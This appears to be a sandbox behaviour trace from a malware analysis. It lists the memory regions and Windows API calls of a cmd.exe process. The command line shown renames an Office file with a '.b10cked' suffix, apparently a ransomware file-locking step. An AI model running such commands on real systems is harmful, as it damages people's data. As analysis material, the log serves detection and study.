mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20712 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20713 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20714 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20715 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20716 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20717 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 20718 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20719 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20720 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 20721 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 20722 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 20723 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 20724 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20725 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 20726 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 315 os_tid = 0xd9c [0153.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f7fc | out: lpSystemTimeAsFileTime=0x18f7fc*(dwLowDateTime=0x9539b200, dwHighDateTime=0x1d440a9)) [0153.166] GetCurrentProcessId () returned 0xddc [0153.166] GetCurrentThreadId () returned 0xd9c [0153.166] GetTickCount () returned 0x2f334 [0153.166] QueryPerformanceCounter (in: lpPerformanceCount=0x18f7f4 | out: lpPerformanceCount=0x18f7f4*=20995562322) returned 1 [0153.167] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.167] __set_app_type (_Type=0x1) [0153.167] __p__fmode () returned 0x76b331f4 [0153.167] __p__commode () returned 0x76b331fc [0153.167] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.167] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.167] GetCurrentThreadId () returned 0xd9c [0153.167] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd9c) returned 0x38 [0153.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.168] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.168] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.172] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f78c | out: phkResult=0x18f78c*=0x0) returned 0x2 [0153.172] VirtualQuery (in: lpAddress=0x18f7c3, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.172] GetConsoleOutputCP () returned 0x1b5 [0153.172] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.172] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.172] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.173] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.173] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.173] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.173] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.173] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.173] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.173] GetEnvironmentStringsW () returned 0x1c0218* [0153.174] FreeEnvironmentStringsW (penv=0x1c0218) returned 1 [0153.174] GetEnvironmentStringsW () returned 0x1c0218* [0153.174] FreeEnvironmentStringsW (penv=0x1c0218) returned 1 [0153.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e6fc | out: phkResult=0x18e6fc*=0x40) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0xa8, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x0, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegCloseKey (hKey=0x40) returned 0x0 [0153.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e6fc | out: phkResult=0x18e6fc*=0x40) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x0, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x9, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x9, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x9, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegCloseKey (hKey=0x40) returned 0x0 [0153.174] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637b [0153.174] srand (_Seed=0x5b88637b) [0153.174] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"" [0153.174] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"" [0153.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.175] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c1978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.175] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.175] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.175] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.175] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.175] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.175] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.175] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.175] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.175] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.175] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.176] GetEnvironmentStringsW () returned 0x1c2368* [0153.176] FreeEnvironmentStringsW (penv=0x1c2368) returned 1 [0153.176] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.176] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.176] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.176] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.176] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.176] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.176] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.176] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.176] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.176] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.176] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f4c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.176] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f4c8, lpFilePart=0x18f4c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4c4*="Desktop") returned 0x18 [0153.176] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.176] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0x1c09f8 [0153.176] FindClose (in: hFindFile=0x1c09f8 | out: hFindFile=0x1c09f8) returned 1 [0153.176] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0x1c09f8 [0153.176] FindClose (in: hFindFile=0x1c09f8 | out: hFindFile=0x1c09f8) returned 1 [0153.177] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f244 | out: lpFindFileData=0x18f244) returned 0x1c09f8 [0153.177] FindClose (in: hFindFile=0x1c09f8 | out: hFindFile=0x1c09f8) returned 1 [0153.177] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.177] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.177] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.177] GetEnvironmentStringsW () returned 0x1c0218* [0153.177] FreeEnvironmentStringsW (penv=0x1c0218) returned 1 [0153.177] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.177] GetConsoleOutputCP () returned 0x1b5 [0153.178] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.178] GetUserDefaultLCID () returned 0x409 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f608, cchData=128 | out: lpLCData="0") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f608, cchData=128 | out: lpLCData="0") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f608, cchData=128 | out: lpLCData="1") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.178] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.179] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.179] GetConsoleTitleW (in: lpConsoleTitle=0x1b0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.180] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.180] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.180] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.180] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.181] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.181] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.181] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.181] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.181] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.181] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.181] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.184] GetConsoleTitleW (in: lpConsoleTitle=0x18f300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.186] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.186] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.186] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.186] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.186] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.186] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.186] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.186] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.186] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.186] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.186] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.186] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.186] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.186] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.186] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.186] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.186] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.186] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.186] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.188] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f0bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f0b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f0b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.188] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.189] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.189] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.189] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0153.189] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0153.189] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~2.trx")) returned 0x2020 [0153.190] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1c1f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.190] SetErrorMode (uMode=0x0) returned 0x0 [0153.190] SetErrorMode (uMode=0x1) returned 0x0 [0153.190] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18ea44, lpFilePart=0x18ea2c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", lpFilePart=0x18ea2c*="GRINTL~2.TRX") returned 0x3c [0153.190] SetErrorMode (uMode=0x0) returned 0x1 [0153.190] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.190] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0153.190] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0153.190] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~2.trx")) returned 0x2020 [0153.190] 